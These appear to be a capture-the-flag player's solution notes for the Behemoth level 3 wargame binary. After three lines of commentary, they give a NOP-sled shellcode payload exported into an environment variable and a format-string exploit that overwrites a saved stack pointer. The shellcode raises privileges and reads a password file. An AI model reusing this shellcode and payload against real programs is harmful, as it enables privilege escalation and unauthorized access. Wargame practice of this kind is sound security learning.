Stack overflow into ENV VAR.
Format string modification of saved ebp onto stack.
Quite difficult and annoying problem...


export CODE=`python -c "print ('\x90'*1024*16) + '\x31\xc0\xb0\x46\x31\xdb\x66\xbb\xcc\x32\x66\x31\xc9\x66\xb9\xcc\x32\xcd\x80\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x70\x61\x73\x73\x89\xe2\x50\x52\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80'"`


 echo `python -c "from pwn import *; print '\xa0\xb9\xff\xff' + ('%6\\$s'
 * 4) + ('\xf8\xa0\xff\xff' * 42) + ('\x10\x96\xff\xff' * 1)  + '%53\\$hn'"` | /behemoth/behemoth3


